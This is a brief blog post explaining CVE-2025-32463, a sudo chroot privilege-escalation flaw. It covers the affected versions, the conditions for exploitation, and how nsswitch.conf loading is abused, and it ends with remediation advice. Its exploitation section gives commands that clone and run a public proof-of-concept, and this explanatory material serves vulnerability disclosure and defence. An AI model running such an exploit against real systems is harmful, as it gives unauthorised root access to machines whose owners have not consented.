CVE-2025-32463
- eduwoldhuis
- Jul 3
- 2 min read
Affected versions
The CVE affects sudo 1.9.14 to 1.9.17, 1.9.17p1 and onwards are safe from this vulnerability.
The conditions for explotiation are:
the sudo version must be in between 1.9.14 - 1.9.17
low-privileged user must be allowed to use sudo with chroot permissions
the user has write-permissions in the chroot directory
Introduction and background
CVE-2025-32463 or "chwoot" is a major vulnerability with a CVSS score of 9.3 (critical), affecting the sudo software. Sudo is used in Linux for managing administrator-level access, making it a critical part of the security infrastructure.
The issue is with how sudo deals with chroot. The chroot option (sudo -R) will run a command with a different directory as the root directory. For more information, reference the Arch wiki docs.
nsswitch.conf
The chroot functionality is handled by the pivot_root and unpivot_root functions. In between of these functions, the Name Service Switch program will load /etc/nsswitch.conf from the directory specified by chroot, but it will execute commands outside of the directory.
The conf format works like this:
First, a database is named (passwd/group/etc). Then, the sources for the data are named (files/systemd/etc).
passwd: files systemd
group: files systemd
shadow: files
gshadow: files When one of the databases is used, a shared object specified by the source will be loaded. The location from where it's loaded will depend on the nsswitch.conf file's location (in chroot), but the location where the shared object will be executed from is the actual system root.
Exploitation
For the exploitation of this CVE, we'll be using this github repository, which contains a ready-made POC and vulnerable docker box.
The direct exploitation is pretty simple.
Setup:
git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot
cd CVE-2025-32463_chwoot
./run.sh
./sudo-chwoot.shRemediation
Update or downgrade sudo to be outside of the 1.9.14-1.9.17 range.